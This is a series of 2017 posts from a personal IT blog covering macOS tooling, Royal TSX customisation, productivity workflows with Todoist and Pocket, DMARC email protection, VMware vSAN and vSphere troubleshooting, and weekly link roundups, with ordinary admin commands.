[ ](https://go.veeam.com/webinar-integration-vmware-vsan-vsphere-spbm-policies?ccode=blogger_Christian Mohn_q042017) Click on the banner above to [register now](https://go.veeam.com/webinar-integration-vmware-vsan-vsphere-spbm-policies?ccode=blogger_Christian Mohn_q042017), and reserve your spot! --- # Mass Converting .svg to .png on macOS URL: https://vNinja.net/osx/mass-converting-svg-to-png-on-macos/ Date: 2017-10-26 Author: christian Tags: Blogtober, HomeBrew, macOS When playing around with Royal TSX I needed to mass convert the VMware Clarity .svg files to .png files that I could use as icons in Royal TSX. After trying a series of different approaches, I ended up using rsvg-convert from libRSVG. In order to get rsvg-convert installed on my MacBook, I turned to HomeBrew. HomeBrew, which calls itself The missing package manager for macOS, is in my opinion essential for any macOS user. If you are missing a command or utility, chances are that HomeBrew has you covered. Mass Converting # Once you have HomeBrew installed, you’re pretty much ready to go by running the following command in Terminal: brew install librsvg This installs the libRSVG formula, and all its dependencies, and makes rsvg-convert available. Once libRSVG is installed locally, you can mass-convert .svg files by running the following command in your terminal of choice. for i in *.svg; do rsvg-convert "$i" -o "${i%.svg}.png"; done This loops through every .svg file in the current directory, and creates .png versions of them, for usage elsewhere. --- # Integrating Pocket with Todoist via IFTTT URL: https://vNinja.net/workflow/integrating-pocket-with-todoist-via-ifttt/ Date: 2017-10-24 Author: christian Tags: IFTTT, Pocket, Todoist, Workflow Myles Gray asked me how I integrate Pocket with Todoist, after my How I use Todoist post, and the answer is very simple: IFTTT.
If-This-Then-That lets you connect services and create rules (or applets) that trigger based on events in those services, and luckily both Todoist and Pocket are supported. Now, there is a bit of overlap between how I use Pocket and Todoist, but I mainly use Pocket to keep track of links I either want to read later, or use as the basis for blog posts. Photo by Kari Shea on Unsplash I have two main IFTTT recipes that take care of my integration between the two. Both of these use Pocket as the source, and Todoist as the target; I do not transfer anything from Todoist to Pocket. IFTTT Applets: # “If new item tagged read, then create a task in To Read” Simply put, if I tag something with the tag read in Pocket, it gets added to my “To Read” sub-project in Todoist. This allows me to quickly move a Pocket item into Todoist as an action item, with the complete URL. It does not assign a label, nor does it set a priority, but it allows me to have a nice link list in Todoist with items I want to read later. Of course, the Todoist Chrome extension allows me to do similar things, but only from the browser. Since I use IFTTT to add my Twitter likes to Pocket etc., it makes sense to have most of that collected in one place for further investigation. “If new item tagged todo, then create a task in Inbox” Similar to the one above, just with the todo tag instead. Naturally those links get placed in my “To Do” project instead. The difference here is that the items that go into my To Do project are things that I want to actively do something with (besides reading). That might be creating a blog post based on something, sending it to a client or coworker, or similar tasks. Workflow # For me, Pocket works as a first repository of content I want to check out, while the content I want to do something further with lives in Todoist. Once they are in Todoist, it’s trivial to move them over to the correct projects and/or labels for organizing.
I have also set up a recurring task, with mobile alerts, to make sure I check my Pocket-lint at least once a week. I’m sure there are other, fancier ways of doing this, or ways to improve on it. Please leave a comment if you do something similar, or something that I haven’t even thought of at all. --- # How I use Todoist URL: https://vNinja.net/workflow/how-i-use-todoist/ Date: 2017-10-24 Author: christian Tags: Blogtober, Todo, Todoist, Work, Workflow As I’ve mentioned before, I use Todoist to keep track of my personal to-do list. This is the first to-do manager I’ve been able to stick with, and I’ve been using it daily for well over 2 years now. In that two year period I’ve reorganised it a bit, but for the most part I’ve been able to keep to the main structure I initially created when setting it up the first time. Photo by Glenn Carstens-Peters Projects # I try to keep my projects organised in main projects, with sub-projects as needed. All items I add should fall into one of these high-level projects. I have the following main projects defined: Work, Private, VMUG, vNinja. Most, if not all, of these are self-explanatory. Anything work related goes into Work, and anything private naturally goes into Private. Most of these have sub-projects as well, like Work, which has sub-projects for my employer and for each of my clients. Labels # In addition to Projects, Todoist also features Labels that you can apply to a task, regardless of which project it is in (think of these as tags). My current list of labels is: @Waiting — Anything that I’m currently waiting for someone else to do something with before I can continue. @Writing — Things I’m planning on writing. @Someday — Something I plan on doing at some point, but haven’t set a deadline for. @Read — Things I’m planning on reading. Priorities # P1 — Important and urgent. Do these now. P2 — Important but not urgent. Must have a due date. Move to P1 on or before the due date. P3 — Not important but urgent.
Delegate to others, or change priority to P2 or P4. P4 — Not important and not urgent. Only do if time permits. No due date. This is based on the Eisenhower Method, and makes it easy to figure out which tasks I should prioritize at any given time. These tie in to the Todoist priorities as well, so I can use both in filters. In addition to this, I have the Todoist app on my phone, and run the Todoist extension in Chrome as well to capture web pages to my @Read list. This is also used in combination with Pocket. I have recurring tasks every day, with mobile notifications, to make sure I check Todoist regularly. After all, I don’t want to lose my Todoist Karma! So far I’ve completed 2850 tasks in Todoist, giving me the Karma level of Grandmaster! For any GTD aficionados out there, you can clearly see that I don’t follow that structure. GTD in itself is probably awesome, if you’re able to stick with it. For me though, GTD takes too much effort in organising tasks and projects, so I’ve created a system that works for me. How do you use your task manager to keep track of your to-do items? --- # VeeamOn Tour Virtual 2017 - Reserve your spot! URL: https://vNinja.net/virtualization/veeamon-tour-virtual-2017-reserve-your-spot/ Date: 2017-10-17 Author: christian Tags: event, Veeam Veeam is hosting their VeeamOn Tour Virtual 2017 event on December 5th, and I’ll be part of the panel of bloggers in the Expert Lounge! Veeam describes the event like this: The biggest online Availability event in EMEA — VeeamON Tour Virtual 2017 — is once again coming to your desktop! No need to leave your chair — Experience Availability simply by joining us for an ultimate digital journey! VeeamON Tour Virtual runs from 11 am to 5 pm CET, and offers three separate tracks: Business, Technical and Cloud. Check out the agenda and sign up for this free event now, find me in the Expert Lounge, and get your Veeam-on!
--- # Making Royal TSX Even More Awesome URL: https://vNinja.net/osx/making-royal-tsx-even-more-awesome/ Date: 2017-10-11 Author: christian Tags: Awesome, Blogtober, management, RoyalTSX, Software For those who don’t know, Royal TSX is an awesome remote management solution, which supports RDP, VNC, SSH, S/FTP and even ESXi and vCenter. I’ve been using it for years, not just because they offer free licenses for vExperts (and others), but simply because it works really well. Store its config file on a synchronized file area (like Dropbox), and boom, your config follows you around from machine to machine, including custom icons. What’s not to like? Following Ryan Johnson’s tweet, where he showed off his VMware Clarity inspired Royal TSX setup, I decided to do something similar. Unlike Ryan, I decided to run with the standard Clarity icons, and not invert them. Since the Clarity icons are in .svg format, I had to convert them to .png to be able to use them as icons in Royal TSX; I’ll post a separate post on how I batch converted them later. Currently, my setup looks like this # Royal TSX with Clarity icons Changing the icons for entries is pretty straightforward. For existing entries in your config file, simply open the item’s properties and click on the small icon beside the Display Name. This brings up a dialog showing the built-in icons, but also reveals an option to browse your filesystem for a new icon to use. Update: Felix from Royal Applications left a nice comment, explaining that you can also drag-and-drop icons directly from Finder into Royal TSX, as an alternative to the manual process described above. To change the default icons, find Default Settings in the Navigation Panel on the left, and follow the same procedure. While the primary goal was to prettify my setup with snazzy new icons, I discovered that I could do quite a few things besides that as well.
As seen in the screenshot, there are a couple of web pages added, but perhaps more interesting are the “PowerCLI” and “Connect VPN” entries. Running PowerCLI Core from Royal TSX # I run the PowerCLI Core Docker container on my Macbook from time to time, so why not have the option to run it directly from Royal TSX? Once you have it up and running, adding it as a Command Task is pretty easy! Add a new Command Task, and put the docker run command in the Command: field. Update: Since originally posting, I’ve discovered that there is an even better way of doing this, which at the same time keeps PowerCLI running in a tab inside of Royal TSX. Instead of adding it as a Command Task, add a new Terminal connection, but use Custom Terminal as the connection type: Then add the command you want to run under Custom Commands. In my case, I want to run the following command: `docker run --rm -it --entrypoint='/usr/bin/powershell' vmware/powerclicore` Now, under “Advanced”, find the Session option. Enable “Run inside login shell” to make sure your applications, like Docker, are found without having to specify the complete path to them, and that’s it. As long as Docker runs locally, PowerCLI Core can now be launched directly from the navigation bar, and it opens a new tab inside of Royal TSX! This can also be used to run other things of course; I’ve added a new Terminal option to my sidebar as well, which opens iTerm2 in a new tab. Connecting to Tunnelblick VPN from Royal TSX # I run OpenVPN at home, and use Tunnelblick as my client of choice. In order to connect to my home network, I’ve created another Command Task, with the “Run in Terminal” option configured, that runs a simple AppleScript command instructing Tunnelblick to connect. osascript -e "tell application \"Tunnelblick\"" -e "connect \"[your-connection-name]\"" -e "end tell" I guess I really understated the percentage of awesomeness increase by doing this, it should at least have been ~~84%~~ 92,7%.
Just did a complete overhaul of my Royal TSX setup. It’s now 78% more awesome. — Christian Mohn™ (@h0bbel) October 11, 2017 --- # PSA: Protect Your Email with DMARC URL: https://vNinja.net/misc/psa-protect-your-email-with-dmarc/ Date: 2017-04-15 Author: christian Tags: dmarc, email, Security In the last few months, I’ve seen an uptick in spoofed emails being sent using my own personal email domain. Not only is this extremely annoying, but more problematic is that recipients receive spam and phishing emails from what seems to be my personal mail account, simply by spoofing the from address. I don’t know why my domain and email address have been “chosen” for this, but I guess this is fallout from the LinkedIn breach way back in 2012. I didn’t think there was much I could do about this, but a recent tweet by my friend Per Thorsheim sent me down the rabbit hole. I love my hard-fail SPF & DMARC email policy, and using @dmarcian to see how spammers fail to take advantage of my domain. :D — Per Thorsheim (@thorsheim) April 12, 2017 Special offer for you my friend: Coffee & cake, and I'll show you HOWTO. :-D — Per Thorsheim (@thorsheim) April 12, 2017 So, obviously there are options available to me that I was completely unaware of. I haven’t managed any public facing email services for 6-7 years, so I’ve not kept up with whatever has been happening in that particular space. Also, my personal email domain has been hosted by Google since 2008, so I haven’t really managed that either. Set and forget, right? Well, not quite. So, what is this DMARC thing? It stands for Domain-based Message Authentication, Reporting & Conformance, and is a way to try and validate that emails from a given domain are being sent using one of the valid mail servers configured for that domain. In order to be able to use DMARC, you first need to have Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) configured for your domain.
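To make the prerequisites concrete, here is roughly what the relevant DNS records can look like. This is an illustrative zone-file fragment only: the domain, the hard-fail SPF policy, and the reporting address are placeholders, not my actual records.

```dns
; Hypothetical zone-file fragment for a Google-hosted domain (example.com is a placeholder)
; SPF: only Google's mail servers may send for this domain; everything else hard-fails
example.com.        IN TXT "v=spf1 include:_spf.google.com -all"
; DMARC: reject mail that fails SPF/DKIM alignment, and email aggregate reports to rua
_dmarc.example.com. IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
```

DKIM adds a third record (a selector under `_domainkey`) whose public-key value comes from your mail provider, which is why it is not shown here.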
Here are the resources I used to get all of this configured for my domain: Configure SPF records to work with G Suite Authenticate email with DKIM Add a DMARC record Less than 24 hours after configuring everything, I received my first DMARC Aggregate Report, which is basically an XML file showing what has been going on. Since this file is a bit hard to read on its own, I uploaded it to DMARC Analyzer, and even though I knew a lot of email was being sent with my email address as the reply-to address, I was quite surprised to see that in less than 24 hours after I set up the DMARC DNS records, **a total of 295 emails had been rejected by mail servers all over the world, most of them sent from mail servers in Vietnam.** I _do not_ send 295 emails a day with my personal email account, and absolutely none of them from Vietnam. In fact, during the time-frame of this initial aggregate report, I sent zero emails - as seen in the screenshot from the report. I have now configured my DMARC DNS TXT records to send aggregate reports directly to DMARC Analyzer, and I’m looking forward to seeing how these numbers add up over time. I’m currently on a free trial plan, and looking to evaluate which of the available DMARC Analyzers out there I want to use permanently. At least now receiving email servers have a fighting chance of rejecting fake emails from my domain, since it’s now possible to verify that they are sent through a valid source. Even if you don’t have problems with someone spoofing your email addresses, please spend 10 minutes configuring this for your domain as well. You never know when something like this might occur, and it’s better to build your defences before you get attacked. That way you stand a chance of stopping it before it gets as ugly as it did in my case. And Per, you are a gentleman and a scholar. Even if I did manage to investigate and set this up on my own, cake and coffee is still on me! --- # VMware vSAN 6.6 - What's New for Day 2 Operations?
URL: https://vNinja.net/virtualization/vmware-vsan-6-6-whats-new-for-day-2-operations/ Date: 2017-04-11 Author: christian Tags: Day 2, management, News, Operations, VMware, vSAN VMware has just announced vSAN 6.6, with over 20 new features. While new and shiny features are nice, I’d like to highlight a couple that I think might be undervalued from a release feature-set perspective, but highly valuable in the day-to-day operations of a vSAN environment, otherwise known as Day 2 operations. vSAN Configuration Assist is one such new feature. While it’s true that it helps with first time configuration of a greenfield vSAN installation (no more bootstrapping, yay!), it also helps with Day 2 operations. It helps configure new hosts added to an existing vSAN enabled cluster, but it also makes it possible to automate updating of IO controllers, both firmware and drivers, directly from within vCenter. As everyone should know by now, vSAN is highly dependent on drivers and firmware being on supported levels. This ties into the improved vSAN Health Check (Enhanced Health Monitoring), which alerts you when new and _verified_ drivers/firmware are available, and if the controller tools are available on the ESXi host, it can also update the firmware for you. Directly from vCenter, utilising maintenance mode like you’re used to from patching your ESXi hosts with VMware Update Manager (even if it’s not integrated into VUM at this point). This new feature takes the vSAN HCL to a new level; it’s no longer just a list of supported IO controllers and their firmware and drivers, it’s now also a software distribution point. At the moment Dell EMC, Fujitsu, Lenovo and SuperMicro are all supported vendors for this new distribution model, hopefully the rest will follow suit quickly. The second feature I would like to highlight as a Day 2 operations enhancement is the new vSAN Cloud Analytics feature.
If you participate in the Customer Experience Improvement Program (CEIP), it will enable custom alerting based on your own environment. For instance, if a new Knowledge Base article is published that pertains to your specific setup, it will alert you about it. One example might be if you have Intel X710 NICs, which can cause PSODs — Wouldn’t it be nice if you got alerted that this might be an issue, and then told how to remediate it? Well, with vSAN 6.6 you’ll get exactly that. With vSAN 6.6 you get both automated, and verified, firmware/driver upgrades, as well as proactive alerting for potential issues through the hive-mind that is the analytics service. This is what VMware calls **Intelligent Operations and Lifecycle Management** in this release, and it’s really hard to argue with that. Of course, vSAN 6.6 provides other Day 2 Operations enhancements as well, like Degraded Device Handling (DDH), simplified Stretched Cluster Witness replacement procedures, Capacity and Policy Pre-Checks and access to the vSAN control plane through the ESXi Host Client, but I’ll leave those for later posts. --- # Cross vCenter VM Mobility Fling - macOS? URL: https://vNinja.net/vmware-2/cross-vcenter-vm-mobility-fling-macos/ Date: 2017-03-28 Author: christian Tags: Awesome, Fling, macOS, VMware, xvMotion The VMware Cross vCenter VM Mobility - CLI Fling was recently updated, so I decided to try it out. In short, this little Java based application allows you to easily move or clone VMs between disparate vCenter environments. The Fling is listed with the following requirements: JDK 1.7 or above Two vCenter instances with ESX 6.0 Windows: Windows Server 2003 or above Linux: RHEL 7.x or above, Ubuntu 11.04 or above There is no mention of macOS there, but I decided to give it a go anyway, and **it turns out that it works just fine on macOS as well!** Just make sure you have the Java JDK installed locally.
When I ran it the first time, I got the following error, since the JAVA_HOME environment variable was not set. ~/Downloads/xvc-mobility-cli_1.2$ sh xvc-mobility.sh set JAVA_HOME to continue the operation This is very easy to fix, just run the following command in your terminal of choice, and xvc-mobility.sh should work just fine on your Mac. export JAVA_HOME=$(/usr/libexec/java_home) Next up is running the Fling with the correct parameters (this is a clone operation, not a relocate): ~/Downloads/xvc-mobility-cli_1.2$ sh xvc-mobility.sh -svc [source-vcenter] -su [source-vcenter-username] -dvc [destination-vcenter] -du [destination-vcenter-username] -vms [vm-name] -dh [destination-host] -dds [destination-datastore] -op clone -cln [destination-vm-name] ... 13:41:40.591 [main] INFO com.vmware.sdkclient.vim.Task - CloneVM_Task | State = SUCCESS | Error = null | Result = com.vmware.vc.ManagedObjectReference@d9a221a7 13:41:40.597 [main] INFO com.vmware.sdkclient.vim.Task - Monitor task end 13:41:40.597 [main] INFO com.vmware.sdkclient.vim.Task - CloneVM_Task took : 0:51:33.728 13:41:40.603 [main] INFO c.v.s.helpers.CrossVcProvHelper - Successfully cloned the vm:[destination-vm-name] I was able to clone a VM from my lab in Bergen to my lab in Oslo, without any problems whatsoever. Not only is that a Cross vCenter vMotion, but also a Cross Country one, awesome! Now this is just an example, please check the official documentation for all the parameters, and what the tool expects. --- # In The Bag #13 - Week 11 2017 URL: https://vNinja.net/inthebag/in-the-bag-13-week-11-2017/ Date: 2017-03-17 Author: christian Tags: InTheBag, News, Weekly Welcome to the thirteenth edition of _In The Bag!_ # Photo by Patrick Lindenberg In The Bag #13 - Week 11 2017 # Technology # [In-Guest UNMAP Fix in ESXi 6.5 Part I: Windows](http://www.codyhosterman.com/2017/03/in-guest-unmap-fix-in-esxi-6-5-patch-1/) & Part II: Linux — Cody Hosterman has tested the UNMAP fixes in ESXi 6.5, with great results.
Glad this is back! [High frequency of read operations on VMware Tools image may cause SD card corruption (2149257)](https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=2149257) **This one is important!** If you’re running ESXi 6.0 from SD cards, make sure to check this. No patch available for 6.5 yet though. [My Windows 10 Template Build Process](https://thevirtualhorizon.com/2017/03/13/my-windows-10-template-build-process/) Sean Massey has published his Windows 10 VM template process, loads of great tips and tricks for tuning your VDI templates here. How to build a Windows 2016 VMware Template An older article, but Michael White has a great guide on building a Windows 2016 template as well. [2-node vSAN topologies review](http://cormachogan.com/2017/03/10/2-node-vsan-topologies-review/) Newly appointed director Cormac goes through a couple of various 2-node vSAN topologies, and supported vSAN witness placement. [vCenter 6.5b Resets Root Password Expiration Settings](https://lonesysadmin.net/2017/03/16/vcenter-6-5b-resets-root-password-expiration-settings/) I’ve verified this in my own lab as well, and I think it’s very unfortunate that this upgrade to vCenter 6.5b does this. Shout-out to Bob Plankers for discovering this. Other / Longreads # A History and Future of the Rise of the Robots This Explains Why You’re Not as Productive as You Want to be ‘London Bridge is down’: the secret plan for the days after the Queen’s death --- # In The Bag #12 - Week 10 2017 URL: https://vNinja.net/inthebag/in-the-bag-12-week-10-2017/ Date: 2017-03-10 Author: christian Tags: InTheBag, Weekly, News Welcome to the twelfth edition of In The Bag!
# In The Bag #12 - Week 10 2017 # Technology # Cloud outages and the couch architects all over the world — Luca has written a great article about the recent AWS S3 outage; it’s sane, articulate and well worth a read. What’s New in VMware Validated Design for Software-Defined Data Center 4.0 – I’m a huge fan of the VVD, and the new additions in 4.0 are highlighted in this great video. Yes, Ransomware can delete your Veeam backups. Oops. Naturally, if your Veeam repository is available on the network, well, things like this might happen. Make sure to design accordingly. VMware Predictive Distributed Resource Scheduler — Another new video from VMware, explaining the new Predictive DRS feature. PowerCLI module for Proactive HA (including simulation) — Of course, this one has to come from William. Check out his new PowerCLI module for configuring and simulating Proactive HA in vSphere 6.5. Other # ‘I thought I was smarter than almost everybody’: my double life as a KGB agent Trump, Putin, and the New Cold War: Amazingly long and thorough article by The New Yorker. Spend some time on this one. The death of rock and roll, part 1,368: The Donald, Foo Fighters first album, and exceeding expectations: A story on how Dave Grohl managed to release the first Foo Fighters album, exceeding pretty much everyone’s expectations at the same time. I can relate to this as a huge Nirvana, and now Foo Fighters, fan. --- # In The Bag #11 - Week 9 2017 URL: https://vNinja.net/inthebag/in-the-bag-11-week-9-2017/ Date: 2017-03-03 Author: christian Tags: InTheBag, News, Weekly Welcome to the eleventh edition of In The Bag! Photo by Andrew Furlan In The Bag #11 - Week 9 2017 # Technology # RVTools 3.9.2 (February, 2017) — One of my favourite, and free, tools for VMware environments has been updated to include support for vSphere 6.5. Use Log Insight as your VMware Security Dashboard — [Edward Haletky](https://twitter.com/texiwill) has created a Log Insight content pack, with a security focus.
This article by Christian Klose shows how you can use it to create a security dashboard. Good stuff! Free ITIL training – Perhaps not the most sexy topic out there, but some basic ITIL training is something everyone needs — even if you don’t utilise it in your organisation. 360 Troubleshooting with vRealize Operations and vRealize Log Insight — Good video from VMware, showing how Operations and Log Insight can work together. Other # Advice to my millennial kids — Great article from John Biggs, read it and then send it to your kids. The Story of Heady Topper, America’s Most Loved Craft Beer — Mmm, beer. This is one I haven’t had yet. Yes, I’m taking deliveries if someone volunteers. --- # In The Bag #10 - Week 8 2017 URL: https://vNinja.net/inthebag/in-the-bag-10-week-8-2017/ Date: 2017-02-26 Author: christian Tags: InTheBag, News, Weekly Welcome to the tenth edition of In The Bag! This one comes a little late, it’s (barely) Sunday here, not Friday! Sorry about that, but I was “stuck” in a secure facility all week, doing a vSphere 5.5 to vSphere 6.5 migration. Photo by Frontline Creative In The Bag #10 - Week 8 2017 # Technology # osx-wificleaner — Over time, we all accumulate a bunch of open networks that we’ve connected to — you do use a VPN while connected to those, right? This little macOS script will clean those right out of your network list, which is a good thing. For one, cleaning out those open networks makes sure your laptop doesn’t reconnect to them automatically, and secondly, manually cleaning up that list is pretty tedious after a while. VMware Technical Papers — Handy little site that makes it easy to find those Technical Papers you’re looking for. Filter by product and read your heart out. VMware IOInsight — Nice new Fling from VMware Labs. Ever wondered what your VMs’ IO characteristics are? Well, IOInsight will give you that, erm, insight in a web based GUI.
How I Ruined Office Productivity With a Face-Replacing Slack Bot — And people say slackbots are useless. Other # Complicated. Weird. Beautiful! The secret Google project to put an aquarium full of tiny, wiggly water bears inside your phone — Yes. Of course. Whut? I bet the new Nokia 3310 won’t have that! A Conversation With Brian Eno About Ambient Music — Well worth a read. I’m not big on ambient music as such, I’m still mostly stuck in my long-gone youth and 90’s grunge, but I might just be coming around. That’s it for this week — Enjoy your week to come. --- # VMware vSphere 6.5 PSOD: GP Exception 13 URL: https://vNinja.net/vmware-2/vmware-vsphere-6-5-psod-gp-exception-13/ Date: 2017-02-25 Author: christian Tags: 6.5, ESXi, KB, vSphere While at a customer site, migrating an old vSphere 5.5 environment to 6.5, several hosts suddenly crashed with a PSOD during the migration. Long story short, we got hit by this: VMware KB 2147958: ESXi 6.5 host fails with PSOD: GP Exception 13 in multiple VMM world at VmAnon_AllocVmmPages (2147958) It turned out that a bunch of the VMs we were vMotioning from the old environment had the cpuid.corePerSocket advanced setting set in the .vmx file, and this can cause ESXi 6.5 to enter a state of panic, and in our case it certainly did. Upgrading the hosts to 6.5a, like the knowledge base article states, alleviated the issue and we did not experience PSODs again while migrating the 100+ VMs from the old environment to the new one. --- # In The Bag #9 - Week 7 2017 URL: https://vNinja.net/virtualization/in-the-bag-9-week-7-2017/ Date: 2017-02-17 Author: christian Tags: InTheBag, News, Weekly Welcome to the ninth edition of _In The Bag!_ Photo by James Sutton In The Bag #9 - Week 7 2017 # Technology # Setting the record straight on DRS, pDRS and Workload Placement — How do DRS and pDRS work, really? What metrics are the basis for decisions, and how often are the calculations done?
Extending the Capabilities of vRealize Automation 7 — Eric Shanks’ Pluralsight courses on vRealize Automation are great, and this new one is no exception. Using vRealize Log Insight Content Pack for vSAN for better visibility — I love logs. Perhaps not as much as my former colleague Espen, but still, logs are extremely useful. Even if there is no immediate fire or apparent problems, log files are important. Designing vSAN Networks – Why Should I Use the Distributed Switch? — The short answer is yes. The why is clearly illustrated in this article. Other # Rush - Tom Sawyer Guitar, Drums, Vocals SIMULTANEOUSLY! Wow. I’m having problems learning to play guitar, and that’s one thing at a time. Experience: I accidentally bought a giant pig — It’s just one of those things you know, the things that just happen… That’s it for this week — Enjoy your weekend! --- # In The Bag #8 - Week 6 2017 URL: https://vNinja.net/inthebag/in-the-bag-8-week-6-2017/ Date: 2017-02-10 Author: christian Tags: InTheBag, News, Weekly Welcome to the eighth edition of In The Bag! Photo by Benjamin Child In The Bag #8 - Week 6 2017 # Technology # Understanding Recovery from Multiple Failures in a vSAN Stretched Cluster — One of the more important things to understand is how to deal with failures in IT-infrastructure, and this is a great write-up from Cormac. What logs do I get when I enable syslog in VCSA 6.5? — As with a lot of things in the vCenter Server Appliance (VCSA), things have changed in v6.5. William highlights what’s happened with remote syslogging in the latest release. Which logs get forwarded, and where. Important stuff. Homelab: Downsizing vCenter Server Appliance 6.5 — The VCSA 6.5 is pretty greedy when it comes to memory resources. This is a handy guide if you need to downsize it a bit for your home lab. Veeam Backup & Replication 9.x Application Events — Great PDF that lists all application events that can show up in Windows logs for Veeam B&R.
The VMware vExpert 2017 and Veeam Vanguard 2017 lists are out — Congrats to all! Other # I Work from Home — I am sure a lot of us can relate to this excellent piece by Colin Nissan for The New Yorker. No more eating and no more meerkat videos, O.K.? Ball in play for a total of 16 minutes and 4 seconds during Super Bowl LI: 16 minutes and 4 seconds of game play, 130 30-second commercials. Makes sense… That’s it for the week — Enjoy your weekend! --- # In The Bag #7 - Week 5 2017 URL: https://vNinja.net/inthebag/in-the-bag-7-week-5-2017/ Date: 2017-02-03 Author: christian Tags: InTheBag, News, Weekly Welcome to the seventh edition of In The Bag! Photo by NordWood Themes In The Bag #7 - Week 5 2017 # Technology # #vSAN Cache Performance Dashboard in #vROps — Simon Eady has created a great vROps dashboard for vSAN cache information. Check it out! vSAN: Update Guide for Dell PERC9 H730 Controller — Perfectly timed, I’m in the process of setting up our internal vSAN based lab-environment at the moment. I have to say, I do love the storagehub.vmware.com content (and layout). It’s a real treasure trove of great information. Free eBook: VMware NSX® Micro-segmentation Day 1 — Wade Holmes and VMware have released a free NSX Micro-segmentation book. Looks like a great resource! GitLab messed up, and had a major meltdown. — I can’t help but feel for the GitLab crew, but man, they’ve set a new standard when it comes to transparency in the face of major events. This is the most honest, and brutal, incident management I’ve seen to date; they even broadcast their recovery work live on YouTube. Other # Tin Foil Hats Actually Make it Easier for the Government to Track Your Thoughts — This is an older article (2012) from The Atlantic, but it’s still a good piece. Be sure to tightly pack your tin foil from now on. Loose won’t do it. Hear Ryan Adams’ Haunting Cover of Radiohead’s ‘Karma Police’ — Great live cover by the cover-master Ryan Adams.
I can’t wait for the real deal with Radiohead playing in Oslo in June though. Now, where are my tickets again? Great Teams Are About Personalities, Not Just Skills — Building a proper team is hard work, and it’s not as easy as you might think. It’s not just a simple matter of putting brilliantly good people together (which is hard enough in itself), but you also need to factor in personality types and other traits to make sure that 1+1 equals more than 2. If you don’t finish your work then you’re just busy, not productive — I can really relate to this, as this is one of my main problems. I’m very good at starting new projects, I’m just not very good at actually finishing them. That’s it for the week — Enjoy your weekend! --- # ESXi Snapshot Problems: msg.snapshot.error-QUIESCINGERROR URL: https://vNinja.net/vmware-2/esxi-snapshot-problems-msg-snapshot-error-quiescingerror/ Date: 2017-02-01 Author: christian Tags: ESXi, NTP, Snapshot, vSphere Photo by Sonja Langford Just a quick post about something I experienced at a client, with ESXi 6.0 hosts, today: If you have trouble performing VMware snapshots, and see a msg.snapshot.error-QUIESCINGERROR error, check the host time settings and NTP. In this case, snapshots of VMs located on other hosts in the cluster were fine, but once a VM was moved to the new host, snapshot operations failed after an hour or so. It turns out a new host in the cluster was not properly set up to use NTP, and time drift between the host and the vCenter caused the snapshot failures. Correcting the time on the host and configuring NTP resolved the issue. Always remember: If the problem isn’t DNS, it almost certainly is NTP. --- # In The Bag #6 - Week 4 2017 URL: https://vNinja.net/inthebag/in-the-bag-6-week-4-2017/ Date: 2017-01-27 Author: christian Tags: InTheBag, News, Weekly Welcome to the sixth edition of In The Bag! It’s been a while since I’ve posted one of these, but here’s giving it a go in 2017 as well.
# In The Bag #6 - Week 4 2017 # Technology # ReFS cluster size with Veeam Backup & Replication: 64KB or 4KB? — My friend Luca has written a great article explaining how to determine the best cluster size for a ReFS based Veeam B&R repository. AWS for VMware Admins – London VMUG Slide Deck — Great presentation by Alex Galbraith and Chris Porter from the London VMUG. Lots of useful information there for those well versed in the VMware universe, but curious about what AWS has to offer. Architecting a vSAN Cluster (part 1) — This is the first in a series of posts (hopefully), and Francis Daly is off to a great start, especially in regards to disk group design in a vSAN cluster. Designing vSAN Networks – Using Multiple Interfaces? — Good primer on how you can, and should, configure multiple NICs for your vSAN traffic. UserCon 2016: Closing keynote: Frank Denneman - VMware Cloud on AWS A closer look — Frank Denneman’s closing keynote from the Nordic VMUG 2016. No one, other than Frank, does a closing keynote wearing a Warriors hoodie. Other # 10 Artists Who’ve Honored David Bowie with Stunning Covers of His Music — I love a good cover and these are good. ‘Singles’ Soundtrack Reissue to Contain Grunge-Era Rarities — I need to buy some new vinyl come May! Worst Tech Predictions Of The Past 100 years — Not sure how many of these are actually real, but still a fun read. --- # 2017 — You Better Deliver URL: https://vNinja.net/misc/2017-you-better-deliver/ Date: 2017-01-15 Author: christian Tags: 2017, Plans Considering it’s mid-January 2017 already, it’s time to do my annual goal list for the new year. My goals for 2017: # Get that VCAP6-DCV Design exam out of the way — I did the beta in March 2016, but missed the mark by a small margin. AWS Associate Certifications — Not sure how many of the three exams I want to do yet, but I’m going to at least give the AWS Certified Solutions Architect exam a go.
Learn something new — This ties into the previous goal a bit, but I will try to allocate time to learning something new every month. Sometimes it might be tech, sometimes it might be soft skills. I’ve purchased a few Udemy courses with this in mind already. Attend an industry conference — Most likely VMworld Barcelona in September. Continue to build the SDDC practice at Proact — The foundations laid in 2016 were awesome. 2017 is the year we have to start executing and delivering on it. vNinja.net — Keep posting whenever I feel like it, but try to keep the “In the Bag"-series going. Photography — Take up photography as a hobby again, I’ve been quiet on that front for quite a while and I miss the creative outlet it provides. With upcoming trips to Liverpool (Liverpool FC vs Arsenal) in March, a Radiohead concert in Oslo in June, and the Secret Solstice festival in Iceland also in June, there should be plenty of opportunities in 2017. I also have a few other personal goals for 2017 that are not listed here, but I’ll keep myself accountable for those as well. Some of them were posted in my 2016 review post: I need to get better at planning things out, not just adding a todo item and thinking that somehow magically makes you more productive. Having a lot of todo items doesn’t really help, unless you plan out how to accomplish them. This is one thing I aim to improve in 2017; breaking bigger tasks into smaller ones to make them manageable and attainable. Clearer focus. This is a continuation of the previous point, but I must get better at channeling energy into the tasks at hand, not on everything all at once. Set up time slots, and use them. Get more sleep. I sleep way too little, and that needs to change drastically. So, bring it on 2017. I think I’m ready for my closeup now.
